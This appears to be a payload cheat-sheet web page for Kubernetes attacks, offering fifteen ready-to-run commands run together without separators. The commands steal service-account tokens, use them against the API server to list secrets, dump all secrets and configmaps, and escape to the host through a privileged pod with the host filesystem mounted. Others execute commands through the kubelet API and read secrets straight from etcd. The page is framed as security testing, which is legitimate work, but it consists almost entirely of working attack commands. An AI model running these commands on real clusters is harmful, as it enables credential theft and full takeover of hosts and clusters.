$loading...
Kubernetes security testing — pod enumeration, secrets access, RBAC abuse, privileged container escape, kubelet API exploitation, and etcd attacks. (15 payloads)
cat /var/run/secrets/kubernetes.io/serviceaccount/tokencat /var/run/secrets/kubernetes.io/serviceaccount/namespaceenv | grep KUBERNETEScurl -sSk -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespacescurl -sSk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/api/v1/namespaces/default/secretskubectl get secrets --all-namespaces -o yamlkubectl get configmaps --all-namespaces -o yamlkubectl auth can-i --listkubectl get clusterrolebindings -o yaml | grep -A5 "subjects"kubectl run escape --image=ubuntu --restart=Never --privileged --overrides='{"spec":{"containers":[{"name":"escape","image":"ubuntu","command":["bash","-c","chroot /host bash"],"volumeMounts":[{"mountPath":"/host","name":"host"}],"securityContext":{"privileged":true}}],"volumes":[{"name":"host","hostPath":{"path":"/"}}]}}'curl -sk https://<NODE_IP>:10250/podscurl -sk -X POST https://<NODE_IP>:10250/run/<ns>/<pod>/<container> -d "cmd=id"ETCDCTL_API=3 etcdctl get / --prefix --keys-onlyETCDCTL_API=3 etcdctl get /registry/secrets/default/mysecretETCDCTL_API=3 etcdctl get / --prefix | grep -A1 "token"Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides